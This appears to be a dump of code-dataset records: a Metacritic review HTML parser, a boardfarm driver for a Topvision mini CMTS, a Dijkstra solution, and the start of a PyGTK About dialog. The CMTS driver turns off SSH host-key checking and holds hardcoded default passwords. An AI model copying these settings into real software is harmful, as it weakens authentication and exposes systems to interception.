\")\n html = html[:end_index]\n \n #the summary is contained within if it can be expanded\n start_index = html.find(\"\") + len(\"\")\n \n #if the summary isn't expanded\n if (start_index - len(\"\") == -1):\n \n #contained with span tags\n start_index = html.find(\"\") + len(\"\")\n end_index = html.find(\"\")\n \n #isolate the summary from the rest of the html code\n summary = html[start_index:end_index]\n \n #remove excess whitespace from both sides\n summary = summary.strip()\n return summary\n \n html = html[start_index:]\n \n end_index = html.find(\"\")\n #isolate it from the rest of the html code\n summary = html[:end_index]\n \n return summary\n \n '''\n Parses the number of people that found the review helpful\n '''\n def parse_helpful():\n \n #find the count of people who found the review helpful\n start_index = self.html.find(\"\") + len(\"\")\n html = self.html[start_index:]\n \n end_index = html.find(\"\")\n #isolate it from the rest of the code and put it in a variable\n yescount = html[:end_index]\n \n #find the total count of users who found it helpful or not\n start_index = html.find(\"\") + len(\"\")\n html = html[start_index:]\n \n end_index = html.find(\"\")\n \n #isolate it from the rest of the code and put it in a variable\n totalcount = html[:end_index]\n \n \n #combine the two counts together into a formatted string\n return yescount + \" of \" + totalcount + \" users found this helpful\"\n \n \n #call the inner methods in order to parse the specific values and assign them to the instance variables\n self.year = parse_year()\n self.score = parse_score()\n self.name = parse_name()\n self.summary = parse_summary()\n self.helpful = parse_helpful()\n ","sub_path":"MetacriticWebScrape/src/webscrape/searchresults/categorydetails/albumdetail/albumparse/album_review.py","file_name":"album_review.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"358215023","text":"#!/usr/bin/env python3\n# Copyright (c) 2020\n#\n# All rights reserved.\n#\n# This file is distributed under the Clear BSD license.\n# The full text can be found in LICENSE in the root directory.\nimport io\nimport ipaddress\nimport logging\nimport re\nimport sys\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom time import sleep\nfrom typing import Dict, List, Optional\n\nimport netaddr\nimport pandas as pd\nimport pexpect\nfrom boardfarm.devices.quagga_router import QuaggaRouter\nfrom boardfarm.exceptions import CodeError, ConnectionRefused, PexpectErrorTimeout\nfrom boardfarm.lib.bft_pexpect_helper import bft_pexpect_helper\nfrom boardfarm.lib.regexlib import AllValidIpv6AddressesRegex, ValidIpv4AddressRegex\nfrom tabulate import tabulate\nfrom termcolor import colored\n\nfrom boardfarm_docsis.devices.base_devices.cmts_template import CmtsTemplate\nfrom boardfarm_docsis.use_cases.cmts_interactions import is_bpi_privacy_disabled\n\nlogger = logging.getLogger(\"bft\")\n\n\nclass MiniCMTS(CmtsTemplate):\n \"\"\"Connects to and configures a Topvision 1U mini CMTS\"\"\"\n\n prompt = [\n \"Topvision(.*)>\",\n \"Topvision(.*)#\",\n r\"Topvision\\(.*\\)#\",\n r\"Topvision\\(.*\\)>\",\n ]\n model = \"mini_cmts\"\n\n def __init__(self, *args, **kwargs) -> None:\n \"\"\"Constructor method\"\"\"\n super().__init__(*args, **kwargs)\n self.conn_cmd = kwargs.get(\"conn_cmd\", None)\n self.connection_type = kwargs.get(\"connection_type\", \"local_serial\")\n self.ipaddr = kwargs.get(\"ipaddr\", None)\n self.username = kwargs.get(\"username\", \"admin\")\n self.password = kwargs.get(\"password\", \"admin\")\n self.password_admin = kwargs.get(\"password_admin\", \"admin\")\n self.mac_domain = kwargs.get(\"mac_domain\", None)\n self.port = kwargs.get(\"port\", 22)\n self.router_ipaddr = kwargs.get(\"router_ipaddr\", None)\n self.router_username = kwargs.get(\"router_username\", \"root\")\n self.router_password = kwargs.get(\"router_password\", \"bigfoot1\")\n self.router_port = kwargs.get(\"router_port\", None)\n if all(\n [\n self.router_ipaddr,\n self.router_username,\n self.router_password,\n self.router_port,\n ]\n ):\n self.__router = QuaggaRouter(\n ipaddr=self.router_ipaddr,\n port=self.router_port,\n username=self.router_username,\n password=self.router_password,\n )\n else:\n self.__router = None\n\n self.name = kwargs.get(\"name\", \"cmts\")\n self.connlock = None\n\n @property\n def _mini_cmts_router(self) -> Optional[QuaggaRouter]:\n \"\"\"To access mini cmts router object in order to perfrom operations\n\n mini cmts router access is composed in cmts class as protected and\n will be accessable in usecases using this protected property object.\n\n :return: protected object of QuaggaRouter class if ip,passwd,user,port\n configs are given else None\n :rtype: QuaggaRouter\n \"\"\"\n return self.__router\n\n def connect(self) -> None:\n \"\"\"This method is used to connect to cmts.\n Login to the cmts based on the connection type available\n :raises Exception: Unable to get prompt on Topvision device\n \"\"\"\n for run in range(5):\n try:\n bft_pexpect_helper.spawn.__init__(\n self,\n command=\"ssh\",\n args=[\n f\"{self.username}@{self.ipaddr}\",\n \"-p\",\n str(self.port),\n \"-o\",\n \"StrictHostKeyChecking=no\",\n \"-o\",\n \"UserKnownHostsFile=/dev/null\",\n \"-o\",\n \"ServerAliveInterval=60\",\n \"-o\",\n \"ServerAliveCountMax=5\",\n ],\n )\n try:\n i = self.expect(\n [\n \"yes/no\",\n \"assword:\",\n \"Last login\",\n self.username + \".*'s password:\",\n ]\n + self.prompt,\n timeout=30,\n )\n except PexpectErrorTimeout as err:\n logger.error(err)\n raise\n except pexpect.EOF:\n if hasattr(self, \"before\"):\n logger.debug(self.before)\n raise\n except (PexpectErrorTimeout, pexpect.EOF) as e:\n logger.error(e)\n logger.error(\n colored(\n f\"Failed to connect to CMTS. Attempt {run+1}\",\n color=\"red\",\n attrs=[\"bold\"],\n )\n )\n self.close()\n self.pid = None\n sleep(5) # take a moment before retrying\n continue\n try:\n self.logfile_read = sys.stdout\n if i == 0:\n self.sendline(\"yes\")\n i = self.expect([\"Last login\", \"assword:\"])\n if i in [1, 3]:\n self.sendline(self.password)\n self.expect(self.prompt[0])\n self.sendline(\"enable\")\n self.expect(self.prompt[1])\n self.additional_setup()\n return\n except pexpect.exceptions.TIMEOUT:\n logger.error(\n \"Unable to get prompt on Topvision mini CMTS device due to timeout.\"\n )\n self.close()\n self.pid = None\n except pexpect.EOF as e:\n logger.error(\n \"Something went wrong during CMTS initialisation. See exception below:\"\n )\n logger.error(repr(e))\n self.close()\n self.pid = None\n\n raise ConnectionRefused(f\"Unable to connect to {self.name}.\")\n\n def check_online(self, cm_mac: str) -> bool:\n \"\"\"Check the CM status from CMTS\n Function checks the CM mode and returns True if online\n :param cm_mac: mac address of the CM\n :type cm_mac: str\n :return: True if the CM is online False otherwise\n :rtype: boolean\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n scm = self._show_cable_modem()\n try:\n result = scm.loc[cm_mac][\"MAC_STATE\"] in [\"online\", \"w-online(pt)\"]\n except KeyError:\n logger.error(f\"CM {cm_mac} is not found on cmts.\")\n result = False\n return result\n\n def logout(self) -> None:\n \"\"\"Logout of the CMTS device\"\"\"\n self.sendline(\"quit\")\n\n @CmtsTemplate.connect_and_run\n def interact(self, escape_character=None, input_filter=None, output_filter=None):\n \"\"\"To open interact session\"\"\"\n super().interact()\n\n def additional_setup(self):\n \"\"\"Function to contain additional initialization steps\"\"\"\n # Change terminal length to inf in order to avoid pagination\n self.sendline(\"terminal length 0\")\n self.expect(self.prompt[1])\n # Increase connection timeout until better solution\n self.sendline(\"config terminal\")\n self.expect(self.prompt)\n self.sendline(\"line vty\")\n self.expect(self.prompt)\n self.sendline(\"exec-timeout 60\")\n self.expect(self.prompt)\n self.sendline(\"end\")\n self.expect(self.prompt)\n\n @CmtsTemplate.connect_and_run\n def __run_and_return_df(\n self,\n cmd: str,\n columns: str,\n index: int,\n skiprows: int = 2,\n skipfooter: int = 1,\n dtype: Optional[dict] = None,\n ) -> pd.DataFrame:\n \"\"\"Internal wrapper for (tabbed output->dataframe) parsing\n :param cmd: cmd to read\n :type cmd: str\n :param columns: name of columns in df (same order as in output)\n :type columns: str\n :param index: column to be dataframe index\n :type index: int\n :param skiprows: how many rows to skip in header\n :type skiproews: int\n :param skipfooter: how many rows to skip in footer\n :type skipfooter: int\n :param dtype: columns\n :types dtypr: dict or None\n :return: parsed dataframe\n \"\"\"\n output = self.check_output(cmd)\n return pd.read_csv(\n io.StringIO(output),\n skiprows=skiprows,\n skipfooter=skipfooter,\n names=columns,\n header=None,\n delim_whitespace=True,\n engine=\"python\",\n index_col=index,\n dtype=dtype,\n )\n\n @CmtsTemplate.connect_and_run\n def _show_cable_modem(self, additional_args: str = \"\") -> pd.DataFrame:\n \"\"\"Internal api to return scm dataframe\"\"\"\n columns = [\n \"MAC_ADDRESS\",\n \"IP_ADDRESS\",\n \"I/F\",\n \"MAC_STATE\",\n \"PRIMARY_SID\",\n \"RXPWR(dBmV)\",\n \"TIMING_OFFSET\",\n \"NUMBER_CPE\",\n \"BPI_ENABLED\",\n \"ONLINE_TIME\",\n ]\n cmd = f\"show cable modem {additional_args}\"\n return self.__run_and_return_df(cmd=cmd, columns=columns, index=\"MAC_ADDRESS\")\n\n @CmtsTemplate.connect_and_run\n def _show_cable_modem_cpe(self, cm_mac: str) -> pd.DataFrame:\n \"\"\"Internal api to return scm cpe dataframe\n :param cm_mac: mac address of the CM\n :type cm_mac: str\n :return: dataframe\"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n columns = [\n \"CPE_MAC\",\n \"CMC_INDEX\",\n \"CM_MAC\",\n \"CPE_IP_ADDRESS\",\n \"DUAL_IP\",\n \"CPE_TYPE\",\n \"LEASE_TIME\",\n \"LEARNED\",\n ]\n cmd = f\"show cable modem {cm_mac} cpe\"\n return self.__run_and_return_df(\n cmd=cmd, columns=columns, index=\"CPE_MAC\", skiprows=1, skipfooter=6\n )\n\n @CmtsTemplate.connect_and_run\n def _show_cable_modem_bonded_channels(self, cm_mac: str) -> pd.DataFrame:\n \"\"\"Internal api to return scm bonded channels dataframe\n :param cm_mac: mac address of the CM\n :type cm_mac: str\n :return: dataframe\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n columns = [\n \"MAC_ADDRESS\",\n \"IP_ADDRESS\",\n \"I/F\",\n \"MAC_STATE\",\n \"PRIMARY_SID\",\n \"UPSTREAM_PRIMARY\",\n \"DOWNSTREAM_PRIMARY\",\n ]\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n cmd = f\"show cable modem {cm_mac} primary-channel\"\n result = self.__run_and_return_df(\n cmd=cmd, columns=columns, index=\"MAC_ADDRESS\", skiprows=2, skipfooter=0\n )\n return result\n\n def DUT_chnl_lock(self, cm_mac: str) -> List[int]:\n \"\"\"Return amount of upstream / downstream channels that modem is bonded to\n :param cm_mac: cable modem mac address\n :type cm_mac: str\n :return: [upstream_channels_count, downstream_channels_count]\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n scm = self._show_cable_modem_bonded_channels(cm_mac)\n upstream_list = str(scm.loc[cm_mac][\"UPSTREAM_PRIMARY\"])\n downstream_list = str(scm.loc[cm_mac][\"DOWNSTREAM_PRIMARY\"])\n # 4(1,2,3,5,6,7,8) 1(2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24)\n upstream_channels_count = len(\n upstream_list.replace(\"(\", \",\").replace(\")\", \"\").split(\",\")\n )\n downstream_channels_count = len(\n downstream_list.replace(\"(\", \",\").replace(\")\", \"\").split(\",\")\n )\n return [upstream_channels_count, downstream_channels_count]\n\n @CmtsTemplate.connect_and_run\n def is_cm_online(\n self,\n ignore_bpi: bool = False,\n ignore_partial: bool = False,\n ignore_cpe: bool = False,\n ) -> bool:\n \"\"\"Returns True if the CM status is operational\n :param ignore_bpi: returns True even when BPI is disabled\n :type ignore_bpi: boolean\n :param ignore_partial: returns True even when the CM is in partial service\n :type ignore_partial: boolean\n :param ignore_cpe: returns True even when LAN<->WAN forwarding is disabled\n :type ignore_cpe: boolean\n :return: True if the CM is operational, False otherwise\n :rtype: boolean\n \"\"\"\n scm = self._show_cable_modem()\n try:\n status = scm.loc[str(self.board_wan_mac)][\"MAC_STATE\"]\n except KeyError:\n logger.error(f\"CM {self.board_wan_mac} is not found on cmts.\")\n raise\n if \"offline\" in status:\n logger.debug(f\"Cable modem is {status}\")\n return False\n if \"init\" in status:\n logger.debug(f\"Cable modem is initialising: {status} \")\n return False\n if \"online\" not in status:\n logger.debug(f\"Cable modem in unkown state: {status} \")\n return False\n # now it must be in some sort of online state\n if not ignore_bpi and not re.search(r\"online\\(p(t|k)\", status):\n logger.debug(f\"Cable modem in BPI is disabled: {status}\")\n return False\n if not ignore_partial and re.search(r\"p-online\", status):\n logger.debug(f\"Cable modem in partial service: {status}\")\n return False\n if not ignore_cpe and re.search(r\"online\\(d\", status):\n logger.debug(f\"Cable modem is prohibited from forwarding data: {status}\")\n return False\n logger.debug(f\"Cable modem is online: {status}\")\n return True\n\n @CmtsTemplate.connect_and_run\n def _clear_offline(self, cm_mac: str) -> None:\n \"\"\"Internal function to clear the CM entry from CMTS\"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n self.sendline(f\"clear cable modem {cm_mac} delete\")\n self.expect(self.prompt)\n\n def clear_offline(self, cm_mac: str) -> None:\n \"\"\"Clear the CM entry from cmts which is offline -clear cable modem delete\n :param cm_mac: mac address of the CM\n :type cm_mac: str\n \"\"\"\n self._clear_offline(cm_mac)\n\n def clear_cm_reset(self, cm_mac: str) -> None:\n \"\"\"Reset the CM from cmts using cli -clear cable modem reset\n :param cm_mac: mac address of the CM\n :type cm_mac: str\n \"\"\"\n self._clear_cm_reset(cm_mac)\n\n @CmtsTemplate.connect_and_run\n def _clear_cm_reset(self, cm_mac: str) -> None:\n \"\"\"Internal function to reset the CM from cmts\"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n self.sendline(f\"clear cable modem {cm_mac} reset\")\n self.expect(self.prompt)\n\n def get_cmip(self, cm_mac: str) -> Optional[str]:\n \"\"\"API to get modem IPv4 address\n :param cm_mac: cable modem mac address\n :return: CM ip in case CM is online, None otherwise\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n return self._get_cable_modem_ip(cm_mac, ipv6=False)\n\n def get_cmipv6(self, cm_mac: str) -> Optional[str]:\n \"\"\"PI to get modem IPv6 address\n :param cm_mac: cable modem mac address\n :return: CM ip in case CM is online, None otherwise\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n return self._get_cable_modem_ip(cm_mac, ipv6=True)\n\n def _get_cable_modem_ip(self, cm_mac: str, ipv6=False) -> str:\n \"\"\"Internal function to get cable modem ip\n :param cm_mac: mac address of the CM\n :type cm_mac: str\n :param ipv6: flag to return ipv6 address\n :type ipv6: bool\n :return: ip address of cable modem or \"None\"\n :rtype: string\n \"\"\"\n # FIXME: BOARDFARM-2422\n if not self.is_cm_online(\n ignore_bpi=is_bpi_privacy_disabled(), ignore_partial=True\n ):\n logger.debug(f\"Modem {cm_mac} is not online. Can not get ip.\")\n return \"None\"\n additional_args = \"ipv6\" if ipv6 else \"\"\n for _ in range(5):\n scm = self._show_cable_modem(additional_args)\n try:\n ip_str = scm.loc[cm_mac][\"IP_ADDRESS\"].strip(\"*\")\n ip = netaddr.IPAddress(ip_str)\n break\n except KeyError:\n logger.error(f\"CM {cm_mac} is not found on cmts.\")\n ip = \"\"\n break\n except netaddr.core.AddrFormatError:\n ip = \"\"\n if ip_str == \"--\":\n logger.error(f\"Modem {cm_mac} offline\")\n break\n logger.error(f\"Failed to convert {ip_str}\")\n sleep(5)\n else:\n ip = None\n return str(ip)\n\n def check_partial_service(self, cm_mac: str) -> bool:\n \"\"\"Check the CM status from CMTS\n Function checks the show cable modem and returns True if p-online\n :param cm_mac: cm mac\n :type cm_mac: str\n :return: True if modem is in partial service, False otherwise\n :rtype: bool\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n scm = self._show_cable_modem()\n return \"p-online\" in scm.loc[cm_mac][\"MAC_STATE\"]\n\n def get_cmts_ip_bundle(\n self, cm_mac: Optional[str] = None, gw_ip: Optional[str] = None\n ) -> str:\n \"\"\"Get CMTS bundle IP, Validate if Gateway IP is configured in CMTS and both are in same network\n The first host address within the network will be assumed to be gateway for Mini CMTS\n :param cm_mac: cm mac\n :type cm_mac: str\n :param gw_ip: gateway ip\n :type gw_ip: str\n :raises assertion error: ERROR: Failed to get the CMTS bundle IP\n :return: gateway ip if address configured on mini cmts else return all ip bundles\n :rtype: str\n \"\"\"\n return self._get_cmts_ip_bundle(cm_mac=cm_mac, gw_ip=gw_ip)\n\n @CmtsTemplate.connect_and_run\n def _get_cmts_ip_bundle(\n self, cm_mac: Optional[str] = None, gw_ip: Optional[str] = None\n ) -> str:\n \"\"\"Internal function to get CMTS bundle IP\"\"\"\n if cm_mac:\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n cmd = 'show running-config | include \"ip address\"'\n output = self.check_output(cmd)\n if gw_ip is None:\n return output\n for line in output.splitlines():\n addr, mask = line.split()[2:-1]\n cmts_ip = ipaddress.ip_interface(addr + \"/\" + mask)\n if gw_ip == str(next(cmts_ip.network.hosts())):\n return gw_ip\n assert 0, \"ERROR: Failed to get the CMTS bundle IP\"\n\n def get_qos_parameter(self, cm_mac: str) -> Dict[str, List[dict]]:\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n columns = (\n [ # Renamed columns to keep output backward compatible with legacy tests\n \"Sfid\",\n \"SF_REF\",\n \"Direction\",\n \"Current State\",\n \"Sid\",\n \"Scheduling Type\",\n \"Traffic Priority\",\n \"Maximum Sustained rate\",\n \"Maximum Burst\",\n \"Minimum Reserved rate\",\n \"Peak rate\",\n \"FLAGS\",\n ]\n )\n cmd = f\"show cable modem {cm_mac} qos\"\n qos_response = self.__run_and_return_df(\n cmd=cmd,\n columns=columns,\n index=[\"Sfid\", \"Direction\"],\n skiprows=3,\n skipfooter=0,\n dtype={\"Sid\": \"object\"},\n )\n result = defaultdict(list)\n for key, data in qos_response.to_dict(\"index\").items():\n data.update({\"Sfid\": str(key[0])})\n result[key[1]].append(data)\n return result\n\n def get_mtaip(self, cm_mac: str, mta_mac: str = None) -> Optional[str]:\n \"\"\"Get the MTA IP from CMTS\n :param cm_mac: mac address of the CM\n :type cm_mac: string\n :param mta_mac: mta mac address\n :type mta_mac: string\n :return: MTA ip address or \"None\" if ip not found\n :rtype: string\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n if mta_mac:\n mta_mac = self.get_cm_mac_cmts_format(mta_mac)\n else:\n mta_mac = self.board_mta_mac\n cpe_list = self._show_cable_modem_cpe(cm_mac)\n try:\n mtaip = cpe_list.loc[mta_mac][\"CPE_IP_ADDRESS\"]\n except KeyError:\n logger.error(f\"MTA {mta_mac} is not found on cmts.\")\n mtaip = \"\"\n return mtaip\n\n def get_cmts_type(self) -> str:\n \"\"\"This function is to get the product type on cmts\n :return: Returns the cmts module type.\n :rtype: string\n \"\"\"\n # Hardcoded for now. Didn't find a place to read this info from terminal yet.\n return \"CC8800\"\n\n def get_cm_mac_domain(self, cm_mac: str) -> str:\n \"\"\"API stub. Not supported on Topvision CC8800\n :param cm_mac: CM mac string. Added for compatibility\n :return: empty string\n \"\"\"\n raise NotImplementedError(\"Not supported on Topvision\")\n\n def get_center_freq(self, cm_mac: str) -> int:\n \"\"\"Get center frequency for CM\n :param cm_mac: CM mac address\n :return:CM primary channel center frequency\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n scm = self._show_cable_modem()\n primary_sid = scm.loc[cm_mac][\"PRIMARY_SID\"]\n # Only one ccmts configured for now, so index is hardcoded\n freq_config = self.check_output(\n f'show running-config interface ccmts 1 | include \"cable downstream {primary_sid} frequency\"'\n )\n # E.g. \" cable downstream 1 frequency 440000000 modulation qam256 annex a power-level 25.0\"\n return int(freq_config.split(\" \")[4])\n\n def get_ertr_ipv4(self, mac: str, offset: int = 2) -> Optional[str]:\n \"\"\"Get erouter ipv4 from CMTS\n :param mac: mac address of the cable modem\n :type mac: string\n :param offset: eRouter mac address offset, defaults to 2\n :return: returns ipv4 address of erouter else None\n :rtype: string, None\n \"\"\"\n cpe = self._show_cable_modem_cpe(mac)\n mac = netaddr.EUI(mac)\n # eRouter mac address is always +2 from CM mac address by convention\n ertr_mac = netaddr.EUI(int(mac) + offset)\n ertr_mac.dialect = netaddr.mac_cisco\n for cpe_mac, cpe_details in cpe.iterrows():\n if cpe_mac == ertr_mac:\n ertr_ipv6 = re.search(\n ValidIpv4AddressRegex, cpe_details[\"CPE_IP_ADDRESS\"]\n )\n if ertr_ipv6:\n return ertr_ipv6.group()\n return None\n\n def get_ertr_ipv6(self, mac: str, offset: int = 2) -> Optional[str]:\n \"\"\"Get erouter ipv4 from CMTS\n :param mac: mac address of the cable modem\n :type mac: string\n :param offset: eRouter mac address offset, defaults to 2\n :return: returns ipv4 address of erouter else None\n :rtype: string, None\n \"\"\"\n cpe = self._show_cable_modem_cpe(mac)\n mac = netaddr.EUI(mac)\n # eRouter mac address is always +2 from CM mac address by convention\n ertr_mac = netaddr.EUI(int(mac) + offset)\n ertr_mac.dialect = netaddr.mac_cisco\n for cpe_mac, cpe_details in cpe.iterrows():\n if cpe_mac == ertr_mac:\n ertr_ipv6 = re.search(\n AllValidIpv6AddressesRegex, cpe_details[\"CPE_IP_ADDRESS\"]\n )\n if ertr_ipv6:\n return ertr_ipv6.group()\n return None\n\n def is_cm_bridged(self, mac: str, offset: int = 2) -> bool:\n \"\"\"Check if the modem is in bridge mode\n :param mac: Mac address of the modem,\n :param offset: eRouter mac address offset, defaults to 2\n :return: True if the modem is bridged mode else False.\n :rtype: boolean\n \"\"\"\n\n cpe = self._show_cable_modem_cpe(mac)\n mac = netaddr.EUI(mac)\n # eRouter mac address is always +2 from CM mac address by convention\n ertr_mac = netaddr.EUI(int(mac) + offset)\n ertr_mac.dialect = netaddr.mac_cisco\n return all(cpe_mac != ertr_mac for cpe_mac, _ in cpe.iterrows())\n\n def _get_current_time(self, fmt: str = \"%Y-%m-%dT%H:%M:%S%z\") -> str:\n \"\"\"used for unittests\"\"\"\n output = self.check_output(\"show sys-date\")\n # TO DO: get tiem timezone as well\n pattern = r\"\\d{4}-(?:0[1-9]|1[0-2])-(?:0[1-9]|[1-2]\\d|3[0-1]) (?:[0-1]\\d|2[0-3]):[0-5]\\d:[0-5]\\d\"\n time_now = re.search(pattern, output)\n if time_now:\n return datetime.strptime(time_now.group(0), \"%Y-%m-%d %H:%M:%S\").strftime(\n fmt\n )\n else:\n raise CodeError(\"Failed to get CMTS current time\")\n\n @CmtsTemplate.connect_and_run\n def get_current_time(self, fmt: str = \"%Y-%m-%dT%H:%M:%S%z\") -> str:\n \"\"\"Returns the current time on the CMTS\n This is full override as the topvision device is a little \"different\"\n NOTE: this is missing the timezone\n :return: the current time as a string formatted as \"YYYY-MM-DD hh:mm:ss\"\n :raises CodeError: if anything went wrong in getting the time\n \"\"\"\n return self._get_current_time(fmt=fmt)\n\n @CmtsTemplate.connect_and_run\n def ping(self, ping_ip: str, ping_count: int = 4, timeout: int = 4) -> bool:\n \"\"\"Ping the device from cmts\n :param ping_ip: device ip which needs to be pinged.\n :param ping_count: optional. Number of ping packets.\n :param timeout: optional, seconds. Timeout for each packet.\n :return: True if all ping packets passed else False\n \"\"\"\n return super().ping(ping_ip=ping_ip, ping_count=ping_count, timeout=timeout)\n\n def tcpdump_capture(\n self,\n fname: str,\n interface: str = \"any\",\n additional_args: Optional[str] = None,\n ) -> None:\n \"\"\"Capture packets from specified interface\n\n Packet capture using tcpdump utility at a specified interface.\n\n :param fname: name of the file where packet captures will be stored\n :type fname: str\n :param interface: name of the interface, defaults to \"all\"\n :type interface: str, optional\n :param additional_args: argument arguments to tcpdump executable, defaults to None\n :type additional_args: Optional[str], optional\n :yield: process id of tcpdump process\n :rtype: None\n \"\"\"\n\n if not self.__router:\n raise NotImplementedError(\n \"CMTS does not support tcpdump, mini cmts router is required for tcpdump\"\n )\n\n return self.__router.tcpdump_capture(\n fname=fname,\n interface=self.__router.iface_dut,\n additional_args=additional_args,\n )\n\n def tcpdump_read_pcap(\n self,\n fname: str,\n additional_args: Optional[str] = None,\n timeout: int = 30,\n rm_pcap: bool = False,\n ) -> str:\n \"\"\"Read packet captures using tcpdump from a device given the file name\n\n :param fname: name of file to read from\n :type fname: str\n :param additional_args: filter to apply on packet display, defaults to None\n :type additional_args: Optional[str], optional\n :param timeout: time for tcpdump read command to complete, defaults to 30\n :type timeout: int, optional\n :param rm_pcap: if True remove packet capture file after read, defaults to False\n :type rm_pcap: bool, optional\n :return: console output from the command execution\n :rtype: str\n \"\"\"\n\n if not self.__router:\n raise NotImplementedError(\n \"CMTS does not support tcpdump, mini cmts router is required for tcpdump\"\n )\n\n return self.__router.tcpdump_read_pcap(\n fname=fname,\n additional_args=additional_args,\n timeout=timeout,\n rm_pcap=rm_pcap,\n )\n\n def tshark_read_pcap(\n self,\n fname: str,\n additional_args: Optional[str] = None,\n timeout: int = 30,\n rm_pcap: bool = False,\n ) -> str:\n \"\"\"Read packet captures from an existing file\n\n :param fname: name of the file in which captures are saved\n :type fname: str\n :param additional_args: additional arguments for tshark command to display filtered output, defaults to None\n :type additional_args: Optional[str], optional\n :param timeout: time out for tshark command to be executed, defaults to 30\n :type timeout: int, optional\n :param rm_pcap: If True remove the packet capture file after reading it, defaults to False\n :type rm_pcap: bool, optional\n :return: return tshark read command console output\n :rtype: str\n \"\"\"\n\n if not self.__router:\n raise NotImplementedError(\n \"CMTS does not support tcpdump, mini cmts router is required for tcpdump\"\n )\n\n return self.__router.tshark_read_pcap(\n fname=fname,\n additional_args=additional_args,\n timeout=timeout,\n rm_pcap=rm_pcap,\n )\n\n def ip_route(self) -> str:\n \"\"\"Execute ip router command on cmts router and return output.\n\n :return: ip route from router object\n :rtype: str\n \"\"\"\n return self._mini_cmts_router.ip_route()\n\n def _get_cm_docsis_provisioned_version(self, mac_address: str) -> float:\n \"\"\"Get docsis version of CM.\n\n :param mac_address: mac address of the cm\n :type mac_address: str\n :return: Docsis version of the cm\n :rtype: float\n :raises CodeError: Failed to get docsis version\n \"\"\"\n mac_address = self.get_cm_mac_cmts_format(mac_address)\n self.sendline(f\"show cable modem {mac_address} doscis version\")\n self.expect(self.prompt)\n out = self.before\n result = re.search(r\"DOCSISv(\\d\\.\\d)\", out)\n version = float(result.group(1))\n if not version:\n raise CodeError(\"Failed to get Docsis version\")\n return version\n\n def _get_cm_channel_bonding_detail(self, mac_address: str) -> dict[str, list[str]]:\n \"\"\"Get the list of primary channel.\n\n :param mac_address: mac address of the cm\n :type mac_address: str\n :return: upstream and downstream channel list\n :rtype: dict[str, list[str]]\n :raises CodeError: Failed to get the channel values\n \"\"\"\n mac_address = self.get_cm_mac_cmts_format(mac_address)\n self.sendline(f\"show cable modem {mac_address} primary-channel\")\n self.expect(self.prompt)\n out = self.before\n result = re.findall(r\"\\d\\([\\d\\,]+\\)\", out)\n if len(result) != 2:\n raise CodeError(f\"Failed to get Upstream & Downstream values:\\n {result}\")\n return dict(zip([\"US\", \"DS\"], [re.findall(r\"\\d+\", i) for i in result]))\n\n\ndef print_dataframe(dataframe: pd.DataFrame, column_number=15):\n \"\"\"Util method to pretty print dataframes to log. Has nothing to do with CMTS itself.\n :param dataframe: dataframe to print\n :param column_number: amount of columns to print in one row\n \"\"\"\n if dataframe.index.names != [None]:\n index_column_name = [\"(\" + \", \".join(dataframe.index.names) + \")\"]\n else:\n index_column_name = [\"INDEX\"]\n start_column = 0\n columns_number = len(dataframe.columns)\n end_column = column_number if columns_number > column_number else columns_number\n while start_column != columns_number:\n table_headers = (\n index_column_name + dataframe.columns[start_column:end_column].to_list()\n )\n logger.debug(\n \"\\n\"\n + tabulate(\n dataframe.loc[:, dataframe.columns[start_column:end_column]],\n tablefmt=\"psql\",\n headers=table_headers,\n )\n )\n start_column = end_column\n end_column = (\n end_column + column_number\n if columns_number - end_column > column_number\n else columns_number\n )\n","sub_path":"boardfarm_docsis/devices/topvision_cmts.py","file_name":"topvision_cmts.py","file_ext":"py","file_size_in_byte":32609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"17955358","text":"import heapq\n\ndef dijkstra(nodes, edges):\n graph = [[]]\n for _ in range(nodes):\n graph.append([])\n for _ in range(edges):\n a, b, length = map(int, input().rstrip().split())\n graph[a].append((b, length))\n graph[b].append((a, length))\n paths = {}\n q = []\n q.append((0, None, 1))\n while len(q) > 0:\n length, prev, cur = heapq.heappop(q)\n if cur not in paths:\n paths[cur] = (prev, length)\n for to, tolength in graph[cur]:\n if to not in paths:\n heapq.heappush(q, (tolength+length, cur, to))\n if nodes in paths:\n path = [nodes]\n cur = paths[nodes][0]\n while cur is not None:\n path.append(cur)\n cur = paths[cur][0]\n path.reverse()\n print(' '.join(map(str, path)))\n else:\n print(-1)\n\ndef main():\n nodes, edges = map(int, input().rstrip().split())\n dijkstra(nodes, edges)\n\nif __name__ == '__main__':\n main()\n","sub_path":"codeforces/0016/20C.py","file_name":"20C.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"326238718","text":"# -*- coding: utf-8 -*-\n\n__all__ = ['AboutDialog']\n\nimport pygtk\npygtk.require('2.0')\nimport gtk\nfrom gnome import url_show\nimport lib.common as common\nfrom lib import i18n\n\nTRANSLATORS = _(\"translator-credits\")\n\ngtk.about_dialog_set_url_hook(lambda dialog, url, data: url_show(url), None)\n\nclass AboutDialog(gtk.AboutDialog):\n \"\"\"\n About dialog class.\n \"\"\"\n def __init__(self, parent=None):\n gtk.AboutDialog.__init__(self)\n\n # Set up the UI\n self._initialize_dialog_widgets()\n self.set_icon_from_file(common.APP_ICON)\n\n def _initialize_dialog_widgets(self):\n 